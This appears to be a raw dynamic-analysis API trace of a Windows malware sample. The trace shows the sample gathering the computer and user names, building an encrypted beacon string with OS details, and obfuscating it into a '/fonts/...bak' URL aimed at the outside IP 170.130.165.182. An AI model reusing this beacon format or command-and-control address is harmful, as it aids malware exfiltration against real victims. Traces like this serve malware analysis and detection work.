RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c5ea50 [0129.715] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c5ea50, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0129.715] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0129.715] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0129.715] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0129.717] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0129.717] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0129.717] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0129.717] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0129.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRH2Ji_2F/GT82FMxGoymkAZ3E_2Bk", lpUsedDefaultChar=0x0) returned 20 [0129.718] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0129.718] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0129.718] lstrlenA (lpString="170.130.165.182") returned 15 [0129.718] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x10) returned 0x2c5ea50 [0129.718] memcpy (in: _Dst=0x2c5ea50, _Src=0x2c59e9c, _Size=0xf | out: _Dst=0x2c5ea50) returned 0x2c5ea50 [0129.718] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0129.718] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5f238 [0129.718] GetTickCount () returned 0x1a90b9f [0129.718] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5) returned 0x2c59a68 [0129.718] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x9) returned 0x2c5ea68 [0129.718] lstrlenA (lpString="%s=%s&") returned 6 [0129.718] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x13) returned 0x2c59a78 [0129.719] sprintf (_Dest=0x2c59a78, _Format="%s=%s&") [0129.719] sprintf (in: _Dest=0x2c59a78, _Format="%s=%s&" | out: _Dest="caquxprh=yrsu&") returned 14 [0129.719] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea68 | out: hHeap=0x2860000) returned 1 [0129.719] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0129.719] lstrlenA (lpString="caquxprh=yrsu&") returned 14 [0129.719] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28050&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0129.719] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd4) returned 0x2c59b28 [0129.719] strcpy (in: _Dest=0x2c59b28, _Source="caquxprh=yrsu&" | out: _Dest="caquxprh=yrsu&") returned="caquxprh=yrsu&" [0129.719] lstrcatA (in: lpString1="caquxprh=yrsu&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28050&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="caquxprh=yrsu&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28050&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="caquxprh=yrsu&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28050&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0129.719] lstrlenA (lpString="caquxprh=yrsu&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28050&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 211 [0129.719] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0129.721] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0129.721] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d2f8) returned 1 [0129.721] CryptSetKeyParam (hKey=0x77d2f8, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0129.721] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c08 [0129.721] memcpy (in: _Dst=0x2c59c08, _Src=0x2c59b28, _Size=0x10 | out: _Dst=0x2c59c08) returned 0x2c59c08 [0129.721] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c08*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c08*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.721] memcpy (in: _Dst=0x2c59c18, _Src=0x2c59b38, _Size=0x10 | out: _Dst=0x2c59c18) returned 0x2c59c18 [0129.721] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c18*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c18*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.721] memcpy (in: _Dst=0x2c59c28, _Src=0x2c59b48, _Size=0x10 | out: _Dst=0x2c59c28) returned 0x2c59c28 [0129.721] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c28*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c28*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.722] memcpy (in: _Dst=0x2c59c38, _Src=0x2c59b58, _Size=0x10 | out: _Dst=0x2c59c38) returned 0x2c59c38 [0129.722] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.722] memcpy (in: _Dst=0x2c59c48, _Src=0x2c59b68, _Size=0x10 | out: _Dst=0x2c59c48) returned 0x2c59c48 [0129.722] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.722] memcpy (in: _Dst=0x2c59c58, _Src=0x2c59b78, _Size=0x10 | out: _Dst=0x2c59c58) returned 0x2c59c58 [0129.722] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.722] memcpy (in: _Dst=0x2c59c68, _Src=0x2c59b88, _Size=0x10 | out: _Dst=0x2c59c68) returned 0x2c59c68 [0129.722] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.722] memcpy (in: _Dst=0x2c59c78, _Src=0x2c59b98, _Size=0x10 | out: _Dst=0x2c59c78) returned 0x2c59c78 [0129.722] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.722] memcpy (in: _Dst=0x2c59c88, _Src=0x2c59ba8, _Size=0x10 | out: _Dst=0x2c59c88) returned 0x2c59c88 [0129.722] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.722] memcpy (in: _Dst=0x2c59c98, _Src=0x2c59bb8, _Size=0x10 | out: _Dst=0x2c59c98) returned 0x2c59c98 [0129.722] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.722] memcpy (in: _Dst=0x2c59ca8, _Src=0x2c59bc8, _Size=0x10 | out: _Dst=0x2c59ca8) returned 0x2c59ca8 [0129.722] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.722] memcpy (in: _Dst=0x2c59cb8, _Src=0x2c59bd8, _Size=0x10 | out: _Dst=0x2c59cb8) returned 0x2c59cb8 [0129.722] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.722] memcpy (in: _Dst=0x2c59cc8, _Src=0x2c59be8, _Size=0x10 | out: _Dst=0x2c59cc8) returned 0x2c59cc8 [0129.722] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.722] memcpy (in: _Dst=0x2c59cd8, _Src=0x2c59bf8, _Size=0x4 | out: _Dst=0x2c59cd8) returned 0x2c59cd8 [0129.722] CryptEncrypt (in: hKey=0x77d2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x4, dwBufLen=0x20 | out: pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0129.722] CryptDestroyKey (hKey=0x77d2f8) returned 1 [0129.722] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0129.722] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5fa40 [0129.722] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c08 | out: hHeap=0x2860000) returned 1 [0129.723] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0129.723] StrTrimA (in: psz="YxWT4AU8gIKfD5nz82G+xGf1XohqLXXTWvPpHPW4oiV4l5NFA/gmLjWqqIs+Pi8ekE0Y4S97WsDdTOeV2p4zvOgzHm6siGK93bMPU89A6RC2OOTYn80Zr1Kd7DwOd7WP2abaqbN5ftwkxFJv6RepbW99/V6hXWsPu6sFm/BMiXZZhpE2YvFQZ/Xlvo0Ib7/98OHY3kqREKLzdTlXTYbk+uJAfTyqQy/9TvlrYKjP6X5ZM7HYulxceF1JwCYQZEQ0AjezZSs4QJXSsnHSvkWadq0XLe5kL4HSw/5qPv/ssgT=", pszTrimChars="\r\n=" | out: psz="YxWT4AU8gIKfD5nz82G+xGf1XohqLXXTWvPpHPW4oiV4l5NFA/gmLjWqqIs+Pi8ekE0Y4S97WsDdTOeV2p4zvOgzHm6siGK93bMPU89A6RC2OOTYn80Zr1Kd7DwOd7WP2abaqbN5ftwkxFJv6RepbW99/V6hXWsPu6sFm/BMiXZZhpE2YvFQZ/Xlvo0Ib7/98OHY3kqREKLzdTlXTYbk+uJAfTyqQy/9TvlrYKjP6X5ZM7HYulxceF1JwCYQZEQ0AjezZSs4QJXSsnHSvkWadq0XLe5kL4HSw/5qPv/ssgT") returned 1 [0129.723] lstrlenA (lpString="YxWT4AU8gIKfD5nz82G+xGf1XohqLXXTWvPpHPW4oiV4l5NFA/gmLjWqqIs+Pi8ekE0Y4S97WsDdTOeV2p4zvOgzHm6siGK93bMPU89A6RC2OOTYn80Zr1Kd7DwOd7WP2abaqbN5ftwkxFJv6RepbW99/V6hXWsPu6sFm/BMiXZZhpE2YvFQZ/Xlvo0Ib7/98OHY3kqREKLzdTlXTYbk+uJAfTyqQy/9TvlrYKjP6X5ZM7HYulxceF1JwCYQZEQ0AjezZSs4QJXSsnHSvkWadq0XLe5kL4HSw/5qPv/ssgT") returned 299 [0129.723] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5fc08 [0129.723] _snprintf (_Dest=0x2c5fc1b, _Count=0x4, _Format="%c%02X") [0129.723] _snprintf (in: _Dest=0x2c5fc1b, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0129.723] _snprintf (in: _Dest=0x2c5fc3b, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0129.723] _snprintf (in: _Dest=0x2c5fc47, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0129.723] _snprintf (in: _Dest=0x2c5fca6, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0129.723] _snprintf (in: _Dest=0x2c5fcb5, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0129.723] _snprintf (in: _Dest=0x2c5fcc7, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0129.723] _snprintf (in: _Dest=0x2c5fcd2, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0129.723] _snprintf (in: _Dest=0x2c5fcea, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0129.723] _snprintf (in: _Dest=0x2c5fcf6, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0129.723] _snprintf (in: _Dest=0x2c5fd3b, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0129.723] _snprintf (in: _Dest=0x2c5fd42, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0129.724] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa40 | out: hHeap=0x2860000) returned 1 [0129.724] lstrlenA (lpString="YxWT4AU8gIKfD5nz82G_2BxGf1XohqLXXTWvPpHPW4oiV4l5NFA_2FgmLjWqqIs_2BPi8ekE0Y4S97WsDdTOeV2p4zvOgzHm6siGK93bMPU89A6RC2OOTYn80Zr1Kd7DwOd7WP2abaqbN5ftwkxFJv6RepbW99_2FV6hXWsPu6sFm_2FBMiXZZhpE2YvFQZ_2FXlvo0Ib7_2F98OHY3kqREKLzdTlXTYbk_2BuJAfTyqQy_2F9TvlrYKjP6X5ZM7HYulxceF1JwCYQZEQ0AjezZSs4QJXSsnHSvkWadq0XLe5kL4HSw_2F5qPv_2FssgT") returned 321 [0129.724] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x16a) returned 0x2c5fa40 [0129.724] memcpy (in: _Dst=0x2c5fa40, _Src=0x2c5fc08, _Size=0x17 | out: _Dst=0x2c5fa40) returned 0x2c5fa40 [0129.724] memcpy (in: _Dst=0x2c5fa58, _Src=0x2c5fc1f, _Size=0xa | out: _Dst=0x2c5fa58) returned 0x2c5fa58 [0129.724] memcpy (in: _Dst=0x2c5fa63, _Src=0x2c5fc29, _Size=0x11 | out: _Dst=0x2c5fa63) returned 0x2c5fa63 [0129.724] memcpy (in: _Dst=0x2c5fa75, _Src=0x2c5fc3a, _Size=0xc | out: _Dst=0x2c5fa75) returned 0x2c5fa75 [0129.724] memcpy (in: _Dst=0x2c5fa82, _Src=0x2c5fc46, _Size=0xb | out: _Dst=0x2c5fa82) returned 0x2c5fa82 [0129.724] memcpy (in: _Dst=0x2c5fa8e, _Src=0x2c5fc51, _Size=0xe | out: _Dst=0x2c5fa8e) returned 0x2c5fa8e [0129.724] memcpy (in: _Dst=0x2c5fa9d, _Src=0x2c5fc5f, _Size=0x15 | out: _Dst=0x2c5fa9d) returned 0x2c5fa9d [0129.724] memcpy (in: _Dst=0x2c5fab3, _Src=0x2c5fc74, _Size=0x10 | out: _Dst=0x2c5fab3) returned 0x2c5fab3 [0129.724] memcpy (in: _Dst=0x2c5fac4, _Src=0x2c5fc84, _Size=0xf | out: _Dst=0x2c5fac4) returned 0x2c5fac4 [0129.724] memcpy (in: _Dst=0x2c5fad4, _Src=0x2c5fc93, _Size=0x12 | out: _Dst=0x2c5fad4) returned 0x2c5fad4 [0129.724] memcpy (in: _Dst=0x2c5fae7, _Src=0x2c5fca5, _Size=0x9 | out: _Dst=0x2c5fae7) returned 0x2c5fae7 [0129.724] memcpy (in: _Dst=0x2c5faf1, _Src=0x2c5fcae, _Size=0x14 | out: _Dst=0x2c5faf1) returned 0x2c5faf1 [0129.724] memcpy (in: _Dst=0x2c5fb06, _Src=0x2c5fcc2, _Size=0x13 | out: _Dst=0x2c5fb06) returned 0x2c5fb06 [0129.724] memcpy (in: _Dst=0x2c5fb1a, _Src=0x2c5fcd5, _Size=0x16 | out: _Dst=0x2c5fb1a) returned 0x2c5fb1a [0129.724] memcpy (in: _Dst=0x2c5fb31, _Src=0x2c5fceb, _Size=0xd | out: _Dst=0x2c5fb31) returned 0x2c5fb31 [0129.724] memcpy (in: _Dst=0x2c5fb3f, _Src=0x2c5fcf8, _Size=0x8 | out: _Dst=0x2c5fb3f) returned 0x2c5fb3f [0129.724] memcpy (in: _Dst=0x2c5fb48, _Src=0x2c5fd00, _Size=0x17 | out: _Dst=0x2c5fb48) returned 0x2c5fb48 [0129.724] memcpy (in: _Dst=0x2c5fb60, _Src=0x2c5fd17, _Size=0xa | out: _Dst=0x2c5fb60) returned 0x2c5fb60 [0129.724] memcpy (in: _Dst=0x2c5fb6b, _Src=0x2c5fd21, _Size=0x11 | out: _Dst=0x2c5fb6b) returned 0x2c5fb6b [0129.724] memcpy (in: _Dst=0x2c5fb7d, _Src=0x2c5fd32, _Size=0x11 | out: _Dst=0x2c5fb7d) returned 0x2c5fb7d [0129.724] memcpy (in: _Dst=0x2c5fb8f, _Src=0x2c5fd43, _Size=0x7 | out: _Dst=0x2c5fb8f) returned 0x2c5fb8f [0129.724] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fc08 | out: hHeap=0x2860000) returned 1 [0129.724] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a78 | out: hHeap=0x2860000) returned 1 [0129.724] StrTrimA (in: psz="YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT", pszTrimChars="\r\n" | out: psz="YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT") returned 0 [0129.724] lstrlenA (lpString="/fonts/") returned 7 [0129.724] lstrlenA (lpString="YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT") returned 341 [0129.724] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x15d) returned 0x2c59b28 [0129.724] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0129.725] lstrcatA (in: lpString1="/fonts/", lpString2="YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT" | out: lpString1="/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT") returned="/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT" [0129.725] lstrcpyA (in: lpString1=0x2c5fa40, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0129.725] lstrcpyA (in: lpString1=0x2c5f238, lpString2="170.130.165.182" | out: lpString1="170.130.165.182") returned="170.130.165.182" [0129.725] lstrcatA (in: lpString1="170.130.165.182", lpString2="/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT" | out: lpString1="170.130.165.182/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT") returned="170.130.165.182/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT" [0129.725] lstrcatA (in: lpString1="170.130.165.182/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT", lpString2=".bak" | out: lpString1="170.130.165.182/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak") returned="170.130.165.182/fonts/YxWT4AU8gIKfD5nz82G_2Bx/Gf1XohqLXX/TWvPpHPW4oiV4l5NF/A_2FgmLjWqqI/s_2BPi8ekE0/Y4S97WsDdTOeV2/p4zvOgzHm6siGK93bMPU8/9A6RC2OOTYn80Zr1/Kd7DwOd7WP2abaq/bN5ftwkxFJv6RepbW9/9_2FV6hXW/sPu6sFm_2FBMiXZZhpE2/YvFQZ_2FXlvo0Ib7_2F/98OHY3kqREKLzdTlXTYbk_/2BuJAfTyqQy_2/F9TvlrYK/jP6X5ZM7HYulxceF1JwCYQZ/EQ0AjezZSs/4QJXSsnHSvkWadq0X/Le5kL4HSw_2F5qPv_/2FssgT.bak" [0129.725] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c [0129.725] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1c8 